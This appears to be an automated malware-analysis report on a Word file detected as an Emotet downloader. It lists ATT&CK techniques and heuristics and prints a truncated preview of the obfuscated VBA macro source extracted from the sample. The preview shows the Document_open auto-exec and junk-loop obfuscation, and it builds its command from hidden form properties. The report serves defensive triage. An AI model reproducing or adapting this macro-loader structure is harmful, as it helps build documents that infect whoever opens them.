MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample contains a VBA macro that is automatically executed upon opening the document, as indicated by the Document_Open macro and the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic. Critical heuristics identify this as a hidden command stager designed to execute code via UserForm properties and CreateObject/GetObject calls. ClamAV detection confirms this is a known Emotet downloader variant.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-7458561-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7458561-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8121 bytes |
SHA-256: 0cd7ccc0fc161a39607d71ebbceefad3644e60dbcd6be62f45af1aeac86c6fd5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Bitxhrjgp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Nvfplifobfo, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Ggvyuqilog
Dim Rjzpngdwx
For Adoevnutxqrg = Wsdafmwkc To 0
Keaoexfvf = xPI
Ywmnbtnrn = CDbl(3)
Gmmxunopzdbg = Tan(MyeW5A)
Dissmfxs = 4 - Rifvxdpjnqynb
Sgqvcwpj = (3 - Luzbqxnopfmht)
Ostmdpglpuygx = Cytwmiqi
Lzlbplnyznev = CDbl(6)
Jejjgrqpso = Tan(Nwfnyjwtspv)
Next
Dim Lllknmteqqpn
Dim Xmuesxtmslj
For Spwoynaiop = Wsdafmwkc To 0
Layfolbpsyk = xPI
Qnaysabzbb = CDbl(3)
Braghjxhngxu = Tan(MyeW5A)
Ahystftg = 4 - Ajvplrkyjlnta
Pnvvkqgrnz = (3 - Iijbvkag)
Hvwvzkvrhgq = Rxkwjtrh
Qbpzjsizbmbf = CDbl(6)
Oqvvwsmjaesdk = Tan(Mgfsdfujkmyy)
Next
Dim Grgtpuhf
Dim Obyhsxlwobgh
For Atfgcxmbgig = Wsdafmwkc To 0
Tgpuueyuywta = xPI
Evgxzdrswo = CDbl(3)
Hemuqbge = Tan(MyeW5A)
Ygmdpubxmfa = 4 - Gzkhicaka
Wtidfstwrnw = (3 - Vnwrzcuctw)
Guxbsgxmvgwm = Umdwukazlvg
Yzodwcizxw = CDbl(6)
Hymqpqjthhiyw = Tan(Uhjcvivyngdzk)
Next
Wnzvxsqak
End Sub
Attribute VB_Name = "Noxbrghspp"
Attribute VB_Base = "0{8D8AB0EE-BCBE-4569-9D91-ACBA2ABA6288}{11439809-AED8-417B-8B3C-336D335BD734}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Iyejcapn"
Function Ialmizozauxqh()
Dim Somucqcw
Dim Mzszclbggbzr
For Jufgbijjtmhva = Wsdafmwkc To 0
Vdatotvnuz = xPI
Rmrbaynkhkwuy = CDbl(3)
Ggsgkxwk = Tan(MyeW5A)
Ybfnglhsiswck = 4 - Nsbkgfugpphcs
Ubtccwhx = (3 - Pcpqgevljxevz)
Dvpxziougxvi = Afvalrdf
Llqjaxzccj = CDbl(6)
Rzbqaiis = Tan(Oiiriuozpyfg)
Next
Fwewzziysa = Bitxhrjgp.Nvfplifobfo
Dim Jttzzpbr
Dim Qffanlmbhzd
For Mofdeuigncrkm = Wsdafmwkc To 0
Dmbrnhfaq = xPI
Qvcjgzyuhkul = CDbl(3)
Ohccopabhxuxl = Tan(MyeW5A)
Goozmeneevr = 4 - Cujbftyzdxc
Onepjnadavf = (3 - Tbdygwejzm)
Sszrdrmmvpzz = Eknczepvax
Qfjhpbrvq = CDbl(6)
Mwetzodb = Tan(Tstvwmjdxs)
Next
Xuozuvkm = Fwewzziysa + Noxbrghspp.Jxzubcxrxu + Noxbrghspp.Gsyrwbuclsok + Noxbrghspp.Ydntosjwwp
Dim Qcwifcgsn
Dim Ulwwtvpu
For Jiabtjdnhweof = Wsdafmwkc To 0
Mrvazsxlq = xPI
Kvzzqebgh = CDbl(3)
Glscefzvffkrg = Tan(MyeW5A)
Tdhlxkylzhoi = 4 - Nzekqlji
Sluxcaetvwk = (3 - Vwlhatupxuvrg)
Psklgtsmp = Zdvmjppaio
Jpcyvryf = CDbl(6)
Xeclzsfcjwgr = Tan(Ukkgcfwskpb)
Next
Zwkyadvwkg = Xuozuvkm + Noxbrghspp.Txzwzvgnylw + Noxbrghspp.Ygdcwgum
Dim Ajtbzfgrttacu
Dim Agtiijgeyeub
For Xhvvtrduxsraj = Wsdafmwkc To 0
Njoqhqxs = xPI
Qteuwedpvvmeh = CDbl(3)
Pfiariac = Tan(MyeW5A)
Vgkjgzoqxd = 4 - Zbnnkoiqibnpr
Ropprcjbytf = (3 - Xojxerfhmdxmu)
Tsvrvlxb = Gvqzptezmst
Lafgfkrdwrg = CDbl(6)
Yoskambkx = Tan(Hxjsmisjbck)
Next
Ialmizozauxqh = Gnnsnrmty + Zwkyadvwkg + Gnnsnrmty
Dim Iunyjhyvwf
Dim Bbygtfrmsf
For Hcmpqervb = Wsdafmwkc To 0
Qcskogroaplcs = xPI
Mzizrdmgq = CDbl(3)
Ifsovhkfidav = Tan(MyeW5A)
Bqgqvatel = 4 - Nczsdvbdtxmw
Drndbmefspnf = (3 - Haetbwiflnfi)
Jjpuuxsigake = Jjfxfgvss
Pkxfzysnlvjz = CDbl(6)
Tcyuejwiaw = Tan(Hdrwrqxze)
Next
End Func
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.